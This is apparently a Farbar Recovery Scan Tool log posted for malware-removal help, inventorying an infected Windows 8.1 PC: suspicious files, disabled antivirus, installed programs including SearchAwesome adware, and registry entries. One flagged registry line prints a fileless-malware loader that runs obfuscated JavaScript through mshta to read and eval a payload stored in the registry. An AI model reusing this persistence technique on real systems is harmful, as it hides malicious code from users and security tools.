2018-05-29 21:04 - 2016-06-16 10:58 - 000003030 _____ C:\Windows\System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3}

2018-05-29 21:04 - 2015-02-11 20:37 - 000003378 _____ C:\Windows\System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8}

2018-05-29 21:04 - 2015-02-11 20:32 - 000003286 _____ C:\Windows\System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF}

2018-05-29 20:47 - 2018-03-22 21:51 - 000000000 ____D C:\Program Files (x86)\s5

2018-05-24 20:30 - 2014-03-18 05:47 - 001164886 _____ C:\Windows\system32\PerfStringBackup.INI

2018-05-23 21:13 - 2016-07-10 13:03 - 000000000 ____D C:\Users\Dan\AppData\Local\gtk-2.0

2018-05-23 21:13 - 2015-02-04 11:43 - 000000000 ____D C:\Users\Dan\.gimp-2.8

 

==================== Files in the root of some directories =======

 

2018-03-22 21:52 - 2018-06-14 21:26 - 000000004 _____ () C:\ProgramData\lock.dat

2018-03-23 18:46 - 2018-03-23 18:46 - 000267264 _____ () C:\ProgramData\TeamVieverService.dll

1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe

1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe

2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe

2017-03-29 19:14 - 2018-06-14 21:27 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys

2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe

2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt

2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG

2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX

2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part

2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS

2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part

2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS

2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part

1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe

2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini

2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel

2018-06-14 21:36 - 2018-06-14 21:36 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini

2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini

 

==================== Bamital & volsnap ======================

 

(There is no automatic fix for files that do not pass verification.)

 

C:\Windows\system32\winlogon.exe => File is digitally signed

C:\Windows\system32\wininit.exe => File is digitally signed

C:\Windows\explorer.exe => File is digitally signed

C:\Windows\SysWOW64\explorer.exe => File is digitally signed

C:\Windows\system32\svchost.exe => File is digitally signed

C:\Windows\SysWOW64\svchost.exe => File is digitally signed

C:\Windows\system32\services.exe => File is digitally signed

C:\Windows\system32\User32.dll => File is digitally signed

C:\Windows\SysWOW64\User32.dll => File is digitally signed

C:\Windows\system32\userinit.exe => File is digitally signed

C:\Windows\SysWOW64\userinit.exe => File is digitally signed

C:\Windows\system32\rpcss.dll => File is digitally signed

C:\Windows\system32\dnsapi.dll => File is digitally signed

C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed

C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

C:\Windows\system32\drivers\coooruyb.sys -> Access Denied <======= ATTENTION

 

LastRegBack: 2018-05-29 22:18

 

==================== End of FRST.txt ============================

 

 

My Addition txt - 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01

Ran by Dan (14-06-2018 21:44:27)

Running from D:\

Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)

Boot Mode: Normal

==========================================================

 

 

==================== Accounts: =============================

 

Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)

Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan

Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)

 

==================== Security Center ========================

 

(If an entry is included in the fixlist, it will be removed.)

 

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}

AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}

AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}

AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}

 

==================== Installed Programs ======================

 

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 

4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)

7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden

7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)

Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)

Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)

Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)

Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)

Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)

Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)

Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)

Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)

Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)

ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)

ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)

ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)

ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)

ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)

ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden

ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)

AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)

AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)

AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)

AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)

AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)

AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)

AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)

AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)

AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)

AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)

AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)

AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)

Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)

Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)

Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)

Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")

Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")

Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")

Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)

Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)

CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)

COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)

CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)

CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)

D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden

DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)

DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )

Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )

FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)

FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)

Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)

Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)

GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)

Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden

Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)

GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)

Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)

Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)

Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)

ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)

ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )

Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)

JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)

Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )

Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)

LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)

MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)

Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )

MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)

Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)

Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)

Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)

Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)

Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)

Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)

Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)

mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )

Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)

Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)

Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)

Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)

Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)

Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)

Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)

Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)

ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)

PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )

PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)

Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)

QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)

Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)

Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)

Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)

Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)

SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION

ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )

Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)

SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)

Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)

Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )

Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )

Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )

Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)

Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden

Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )

VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)

VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden

VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)

WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)

WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)

WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)

WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)

Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)

Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )

WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)

WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)

WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)

WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)

WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)

Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)

 

==================== Custom CLSID (Whitelisted): ==========================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION

CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File

CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION

ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)

ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)

ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)

ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)

ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)

ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)

ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)

